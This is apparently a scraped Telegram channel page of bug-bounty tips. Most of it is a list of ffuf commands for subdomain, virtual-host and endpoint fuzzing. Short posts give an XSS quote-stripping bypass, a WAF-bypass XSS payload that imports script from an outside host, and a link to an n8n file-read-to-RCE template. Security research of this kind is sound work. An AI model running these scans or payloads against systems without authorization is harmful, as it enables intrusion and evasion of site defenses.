NEW BOT Телеграм, страница

RadvanSec

🔎 #BugBountyTip Advanced Fuzzing Techniques Most Hunters Miss

0) Setup variables (optional)

DOMAIN="company.com"
ORIGIN="company.com" # or https://<cdn-origin> or https://<ip>
WL="words.txt"
HY="hybrid.txt"

1) Direct subdomain fuzz (fast check)

Works when DNS resolves the hostnames.

ffuf -w "$WL" -u "https://FUZZ.$DOMAIN/" -t 200 -mc 200,301,302,401,403 -fs 0 -ac

2) VHOST / Host-header fuzz (CDN / reverse proxy routing)

When wildcard DNS isn’t visible but routing exists.

ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac

Save results (JSON)

ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -of json -o vhost_fuzz.json -ac

3) Hyphenated hosts

ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ-$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

4) Suffix & prefix environment tags

FUZZ-test.company.com

ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ-test.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

test-FUZZ.company.com

ffuf -w "$WL" -u "$ORIGIN" -H "Host: test-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

FUZZ.stage.company.com

ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.stage.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

stage-FUZZ.company.com

ffuf -w "$WL" -u "$ORIGIN" -H "Host: stage-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

5) WWW namespace exploitation (🔥)

FUZZwww.company.com

ffuf -w "$HY" -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

wwwFUZZ.company.com

ffuf -w "$HY" -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

wwFUZZ.company.com

ffuf -w "$HY" -u "$ORIGIN" -H "Host: wwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

FUZZww.company.com

ffuf -w "$HY" -u "$ORIGIN" -H "Host: FUZZww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

6) Numeric drift (use a numbers list)

Create a quick numbers list:

seq -w 0 500 > nums.txt

025www.company.com style

ffuf -w nums.txt -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

www02.company.com style

ffuf -w nums.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

www-03.company.com style

ffuf -w nums.txt -u "$ORIGIN" -H "Host: www-FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac

03-www.company.com style

ffuf -w nums.txt -u "$ORIGIN" -H "Host: FUZZ-www.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac

7) Separator drift (dot / hyphen / underscore / none)

underscore in DNS labels is uncommon but shows up in some internal/service records; test where allowed.

ffuf -w "$WL" -u "$ORIGIN" -H "Host: www-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

ffuf -w "$WL" -u "$ORIGIN" -H "Host: www_FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

ffuf -w "$WL" -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

8) Token fusion (role bleeding)

Use a curated list roles.txt like: api auth cdn static sso id app admin internal edge

ffuf -w roles.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

ffuf -w roles.txt -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

9) Third-party / vendor overlay

vendors.txt: jira confluence grafana kibana sentry datadog okta zendesk status

ffuf -w vendors.txt -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 200 -mc 200,301,302,401,403 -fs 0 -ac

ffuf -w vendors.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

10) Endpoint fuzzing (same mindset, different surface)

ffuf -w endpoints.txt -u "$ORIGIN/FUZZ" -t 200 -mc 200,204,301,302,401,403 -fc 404 -fs 0 -ac

With extensions

ffuf -w endpoints.txt -u "$ORIGIN/FUZZ" -e .php,.asp,.aspx,.jsp,.json,.txt,.bak,.zip -t 200 -mc 200,301,302,401,403 -fc 404 -fs 0 -ac

⭐️ @RadvanSec

👍4

731 viewsSin0x001, edited 18:06

RadvanSec

Forwarded from GO-TO CVE

با عرض سلام خدمت همه‌ی عزیزان

علیرغم وجود اسکم‌ها و مشکلات متعدد در برخی برنامه‌های باگ‌بانتی ایرانی و خارجی، تصمیم گرفتم این کانال رو راه‌اندازی کنم تا بتونیم تجربه‌های واقعی بچه های امنیت کار رو از همکاری با این برنامه‌ها در یکجا جمع‌آوری کنم.

هدف من و ادمین های عزیز اینه که بعد از بررسی و اطمینان از صحت گزارش‌ها، اون‌ها رو در اختیار عموم قرار بدیم تا سایر دوستان وقت، انرژی و تخصصشون رو بی‌دلیل تلف نکنن و بتونن آگاهانه‌تر وارد این حوزه یا کار روی برنامه خاصی بشن .

این کانال متعلق به همه‌ی شماست — جایی برای شفافیت، تجربه‌محوری و حمایت از جامعه امنیتی کشور. ⚡️

https://news.1rj.ru/str/bugbountyfeedback

BugBountyFeedback

در این کانال از پلتفورم ها و برنامه هایی که کار کردیم و به هر دلیلی پول عزیزان باگ هانتر را ندادند مینویسم .

👎3

256 views‌ ‌⁮reza, 18:23

RadvanSec

Found an XSS bypass during a bug bounty:
Backend was only stripping quotes ("), so payload like:

<s"vg o"nload=al"ert() />

turns into a valid:

<noscript onload=alert()>

🚨 Never rely on poor input filtering!

#BugBounty #CyberSecurity

⭐️ @RadvanSec

❤2👍2🔥1

363 viewsSin0x001, 07:54

RadvanSec

https://portswigger.net/research/top-10-web-hacking-techniques-of-2025-nominations-open

⭐️ @RadvanSec

PortSwigger Research

Top 10 web hacking techniques of 2025: call for nominations

Over the last year, security researchers have shared a huge amount of work with the community through blog posts, presentations, and whitepapers. This is great, but it also means genuinely reusable te

❤4🔥1

388 views‌ ‌⁮reza, 17:41

RadvanSec

#Bypass Imperva, Akamai and CloudFlare WAF

=> Prepend with 50 chars then use

1"><A HRef=%26quot AutoFocus OnFocus%0C={import(/https:X55.is/.source)}>

PoC: x55.is/brutelogic/xss…

⭐️ @RadvanSec

❤4

440 viewsSin0x001, 07:03

RadvanSec

Forwarded from محمد نصیری | بنیانگذار انجمن تخصصی فناوری اطلاعات ایران

روزهای خیلی خوبی میاد … شک نکنید

❤11❤‍🔥1🔥1

406 views12:30

RadvanSec

CVE-2026-21858.yaml

1.8 KB

n8n Ni8mare - Unauthenticated Arbitrary File Read to RCE Chain
https://github.com/Chocapikk/CVE-2026-21858